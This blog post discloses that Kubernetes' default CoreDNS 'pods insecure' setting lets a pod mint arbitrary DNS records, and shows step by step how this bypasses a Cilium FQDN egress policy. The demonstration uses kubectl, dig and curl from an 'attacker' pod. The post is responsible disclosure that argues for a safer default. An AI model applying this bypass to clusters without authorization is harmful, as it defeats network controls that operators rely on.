Kube-Dns on DaTosh Blog https://blog.kammel.dev/tags/kube-dns/ Software Engineering, Security, and Cloud Native Technologies Hugo -- gohugo.io en-us DaTosh DaTosh Mon, 18 May 2026 00:00:00 +0000 Kubernetes' Default CoreDNS Configuration is *insecure* https://blog.kammel.dev/post/kubernetes_coredns_insecure/ Mon, 18 May 2026 00:00:00 +0000 DaTosh https://blog.kammel.dev/post/kubernetes_coredns_insecure/ <p><a href="https://github.com/coredns/coredns">CoreDNS</a> is the DNS server that powers most (all?) Kubernetes distributions, ever since it was made the default in <a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.13.md#sig-network">v1.13</a> in December 2018.</p> <p>Chances are, you&rsquo;ve never heard of or used its predecessor: <a href="https://github.com/kubernetes/dns">kube-dns</a>. Lucky for us, CoreDNS still has a config option to remind us. <code>pods insecure</code> is the <a href="https://github.com/kubernetes/kubernetes/blob/release-1.35/cmd/kubeadm/app/phases/addons/dns/manifests.go#L178">default configuration option</a> for most (again - all?) Kubernetes distributions, and was introduced as an option to provide <a href="https://coredns.io/plugins/kubernetes/">&ldquo;backward compatibility with kube-dns&rdquo;</a>. The simple fact that the option&rsquo;s value is <strong>insecure</strong> should be enough to make us reconsider.</p> <p>But alas&hellip; it is not. So, what does it do? And, what are the implications?</p> <h2 id="what-does-it-do">What does it do?</h2> <p>Let&rsquo;s go to our <a href="https://labs.iximiuz.com/playgrounds">favorite K8s playground</a>, spin up a cluster, and quickly confirm we are working with the <code>insecure</code> configuration:</p> <div class="highlight"><pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh-session" data-lang="sh-session"><span style="display:flex;"><span><span style="color:#4c566a;font-weight:bold">$</span> kubectl -n kube-system get cm coredns -oyaml </span></span></code></pre></div><p>And indeed we are:</p> <div class="highlight"><pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#81a1c1">apiVersion</span><span style="color:#eceff4">:</span> v1 </span></span><span style="display:flex;"><span><span style="color:#81a1c1">kind</span><span style="color:#eceff4">:</span> ConfigMap </span></span><span style="display:flex;"><span><span style="color:#81a1c1">data</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">Corefile</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> .:53 { </span></span><span style="display:flex;"><span> errors </span></span><span style="display:flex;"><span> health { </span></span><span style="display:flex;"><span> lameduck 5s </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> ready </span></span><span style="display:flex;"><span> kubernetes cluster.local in-addr.arpa ip6.arpa { </span></span><span style="display:flex;"><span> pods insecure </span></span><span style="display:flex;"><span> fallthrough in-addr.arpa ip6.arpa </span></span><span style="display:flex;"><span> ttl 30 </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> prometheus :9153 </span></span><span style="display:flex;"><span> forward . /etc/resolv.conf { </span></span><span style="display:flex;"><span> max_concurrent 1000 </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> cache 30 { </span></span><span style="display:flex;"><span> disable success cluster.local </span></span><span style="display:flex;"><span> disable denial cluster.local </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> loop </span></span><span style="display:flex;"><span> reload </span></span><span style="display:flex;"><span> loadbalance </span></span><span style="display:flex;"><span> } </span></span></code></pre></div><p>As the documentation states, this option forces CoreDNS to &ldquo;always return an A record with IP from request (without checking k8s)&rdquo;. Basically, this gives us the option to mint arbitrary DNS A records. Let&rsquo;s create a pod and have some fun:</p> <div class="highlight"><pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>kubectl apply -f - <span style="color:#a3be8c">&lt;&lt;EOF </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c">apiVersion: v1 </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c">kind: Pod </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c">metadata: </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> name: attacker </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> namespace: default </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> labels: </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> app: attacker </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c">spec: </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> containers: </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> - name: attacker </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> image: ubuntu:noble </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> command: [&#34;sleep&#34;, &#34;3600&#34;] </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> resources: </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> limits: </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> memory: &#34;256Mi&#34; </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c"> cpu: &#34;250m&#34; </span></span></span><span style="display:flex;"><span><span style="color:#a3be8c">EOF</span> </span></span><span style="display:flex;"><span>kubectl <span style="color:#81a1c1">exec</span> attacker -it -- bash </span></span></code></pre></div><p>Inside the pod:</p> <div class="highlight"><pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh-session" data-lang="sh-session"><span style="display:flex;"><span><span style="color:#4c566a;font-weight:bold">$</span> apt update <span style="color:#81a1c1">&amp;&amp;</span> apt install -y curl dnsutils </span></span><span style="display:flex;"><span><span style="color:#4c566a;font-weight:bold">$</span> dig +short 169-254-169-254.default.pod.cluster.local </span></span><span style="display:flex;"><span>169.254.169.254 </span></span></code></pre></div><h3 id="what-are-the-implications">What are the implications?</h3> <p>As the CoreDNS documentation further states, &ldquo;this option is vulnerable to abuse if used maliciously in conjunction with wildcard SSL certs&rdquo;. While this is definitely an issue, I&rsquo;d like to take a different route here.</p> <p>Let&rsquo;s assume we have Cilium installed in our cluster to handle network policies. Let&rsquo;s further assume we have a network policy like so:</p> <div class="highlight"><pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#81a1c1">apiVersion</span><span style="color:#eceff4">:</span> <span style="color:#a3be8c">&#34;cilium.io/v2&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#81a1c1">kind</span><span style="color:#eceff4">:</span> CiliumNetworkPolicy </span></span><span style="display:flex;"><span><span style="color:#81a1c1">metadata</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">name</span><span style="color:#eceff4">:</span> limit-to-local </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">namespace</span><span style="color:#eceff4">:</span> default </span></span><span style="display:flex;"><span><span style="color:#81a1c1">spec</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">endpointSelector</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">matchLabels</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">app</span><span style="color:#eceff4">:</span> attacker </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">egress</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> <span style="color:#616e87;font-style:italic"># Rule 1: Allow DNS resolution (Required for FQDN rules to work)</span> </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">toEndpoints</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">matchLabels</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">&#34;k8s:io.kubernetes.pod.namespace&#34;: </span>kube-system </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">k8s-app</span><span style="color:#eceff4">:</span> kube-dns </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">toPorts</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">ports</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">port</span><span style="color:#eceff4">:</span> <span style="color:#a3be8c">&#34;53&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">protocol</span><span style="color:#eceff4">:</span> UDP </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">rules</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">dns</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">matchPattern</span><span style="color:#eceff4">:</span> <span style="color:#a3be8c">&#34;*&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#616e87;font-style:italic"># Rule 2: Allow internal traffic only, or...?</span> </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">toFQDNs</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">matchPattern</span><span style="color:#eceff4">:</span> <span style="color:#a3be8c">&#34;**.cluster.local&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">toPorts</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">ports</span><span style="color:#eceff4">:</span> </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">port</span><span style="color:#eceff4">:</span> <span style="color:#a3be8c">&#34;443&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">protocol</span><span style="color:#eceff4">:</span> TCP </span></span><span style="display:flex;"><span> - <span style="color:#81a1c1">port</span><span style="color:#eceff4">:</span> <span style="color:#a3be8c">&#34;80&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#81a1c1">protocol</span><span style="color:#eceff4">:</span> TCP </span></span></code></pre></div><p>One would assume that this policy prevents any outbound network traffic&hellip; and indeed it does:</p> <div class="highlight"><pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh-session" data-lang="sh-session"><span style="display:flex;"><span><span style="color:#4c566a;font-weight:bold">$</span> kubectl <span style="color:#81a1c1">exec</span> attacker -it -- curl ifconfig.me </span></span><span style="display:flex;"><span>203.0.113.0 </span></span><span style="display:flex;"><span><span style="color:#bf616a"> </span></span></span><span style="display:flex;"><span><span style="color:#bf616a"></span><span style="color:#4c566a;font-weight:bold">$</span> kubectl apply -f netpol.yaml </span></span><span style="display:flex;"><span>ciliumnetworkpolicy.cilium.io/limit-to-local created </span></span><span style="display:flex;"><span><span style="color:#bf616a"> </span></span></span><span style="display:flex;"><span><span style="color:#bf616a"></span><span style="color:#4c566a;font-weight:bold">$</span> kubectl <span style="color:#81a1c1">exec</span> attacker -it -- curl ifconfig.me </span></span><span style="display:flex;"><span>**cricket noises** </span></span></code></pre></div><p>Let&rsquo;s check which IP this is trying to connect to:</p> <div class="highlight"><pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh-session" data-lang="sh-session"><span style="display:flex;"><span><span style="color:#4c566a;font-weight:bold">$</span> kubectl <span style="color:#81a1c1">exec</span> attacker -it -- curl -v ifconfig.me </span></span><span style="display:flex;"><span>* Host ifconfig.me:80 was resolved. </span></span><span style="display:flex;"><span>* IPv6: 2600:1901:0:b2bd:: </span></span><span style="display:flex;"><span>* IPv4: 34.160.111.145 </span></span></code></pre></div><p>If we show Cilium that this IP belongs to <code>*.cluster.local</code>, it will generously let us pass:</p> <div class="highlight"><pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh-session" data-lang="sh-session"><span style="display:flex;"><span><span style="color:#4c566a;font-weight:bold">$</span> kubectl <span style="color:#81a1c1">exec</span> attacker -it -- dig +short 34-160-111-145.default.pod.cluster.local </span></span><span style="display:flex;"><span>34.160.111.145 </span></span><span style="display:flex;"><span><span style="color:#4c566a;font-weight:bold">$</span> kubectl <span style="color:#81a1c1">exec</span> attacker -it -- curl ifconfig.me </span></span><span style="display:flex;"><span>203.0.113.0 </span></span></code></pre></div><h3 id="what-happened-here">What happened here?</h3> <p>Cilium keeps a list of all the IPs and FQDNs it has seen and will make policy decisions based on these values.</p> <div class="highlight"><pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh-session" data-lang="sh-session"><span style="display:flex;"><span><span style="color:#4c566a;font-weight:bold">$</span> kubectl -n kube-system <span style="color:#81a1c1">exec</span> cilium-vvlqz -- cilium fqdn cache list </span></span><span style="display:flex;"><span>Endpoint Source FQDN TTL ExpirationTime IPs </span></span><span style="display:flex;"><span>198 connection 34-160-111-145.default.pod.cluster.local. 0 2026-05-18T20:45:11.234Z 34.160.111.145 </span></span><span style="display:flex;"><span>198 connection ifconfig.me. 0 2026-05-18T20:45:11.234Z 34.160.111.145 </span></span></code></pre></div><p>I have <a href="https://blog.kammel.dev/cilium-report.md">reported</a> this to the Cilium project, and they have <a href="https://github.com/cilium/cilium/pull/45525">improved their documentation</a> to mitigate this issue.</p> <div class="info-box info-box--info"> <div class="info-box__header"> <i class="fas fa-info-circle"></i> <span>Info</span> </div> <div class="info-box__content"> The cache is local to the node. Make sure to run the <code>cilium</code> command in a cilium pod that shares the node with your attacker pod. </div> </div> <h2 id="conclusion">Conclusion</h2> <p>All of this is to say: It has been 8 years since we made the switch from kube-dns to CoreDNS. I think it is time to also make the switch from the <code>insecure</code> compatibility flag to <code>verified</code> and make our cluster DNS a little bit more secure.</p> <p>I have raised this issue during the <a href="https://docs.google.com/document/d/1GgmmNYN88IZ2v2NBiO3gdU8Riomm0upge_XNVxEYXp0/edit?tab=t.0#heading=h.iab0zz7n53x1">SIG Security meeting in April</a>, and <a href="https://github.com/coredns/coredns/issues/8043">raised an issue with the CoreDNS project</a>. I hope that this blog post servers as one more reason to start changing the default to <code>verified</code> in every Kubernetes distribution.</p> <p>If you are a K8s distribution maintainer, <a href="https://www.linkedin.com/in/fabian-kammel-7781b7173/">please reach out</a>! I am happy to share my findings to aid in your migration.</p>